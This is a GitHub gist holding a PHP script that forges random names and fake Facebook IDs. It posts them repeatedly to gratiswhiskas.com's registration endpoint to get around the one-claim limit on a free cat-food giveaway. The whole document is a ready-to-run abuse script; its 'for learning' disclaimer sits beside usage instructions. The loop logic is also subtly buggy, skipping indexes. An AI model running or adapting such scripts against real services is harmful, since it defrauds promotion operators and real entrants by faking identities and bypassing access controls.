Skip to content

Instantly share code, notes, and snippets.

@oktavianto
Last active March 7, 2017 10:35
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save oktavianto/ef6ff2c24b943dd746a1273e0ac937a1 to your computer and use it in GitHub Desktop.
Save oktavianto/ef6ff2c24b943dd746a1273e0ac937a1 to your computer and use it in GitHub Desktop.
Facebook Login Bypass gratiswhiskas.com by Oktavianto
<?php
/*
Gratis Makanan Kucing Dari gratiswhiskas.com
Script ini berfungsi untuk submit lebih dari 1x (karena aslinya dibatasi hanya 1x)
HOW TO USE
root@oktavianto:# php filename.php
SCRIPT INI BERTUJUAN UNTUK PEMBELAJARAN BAGI PARA USER/DEVELOPER
USE AT YOUR OWN RISK
*/
// GENERATE DATA FACEBOOK
$depan = array('Hena','Rahmad','Ucok','Udin','Gambut','Farid','Rana','Jafar');
$belakang = array('Asaludin','Mahmud','Fuad','Kuda','Jerapa','Gajah','Sapi','Unta');
for ($i=0; $i < 20+1; $i++) {
$nama[] = $depan[rand(0, count($depan)-1)]."+".$belakang[rand(0, count($belakang)-1)]."<br>";
$fbid[] = "1".rand(1000,9999)."32".rand(1000,9999)."4".rand(1000,9999);
}
function curlPost($data) {
$ch = curl_init("https://www.gratiswhiskas.com/register_action");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
for ($i=0; $i < 20+1; $i++) {
//product_type = adult / kitten
$data = "name=Your+Name&email=youremail%40gmail.com&cat_name=Nama+Kucing&cat_age=1&address=Your+Address&province_id=Id+Province&regency_id=Id+City&district_id=Id+Kecamatan&zipcode=KodePos&phone=NoHp&tnc=on&product_type=kitten&fbid=".$fbid[$i++]."&fbname=".$nama[$i++]."&fbemail=&cid=481387909.1488821667";
echo curlPost($data)."\n";
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment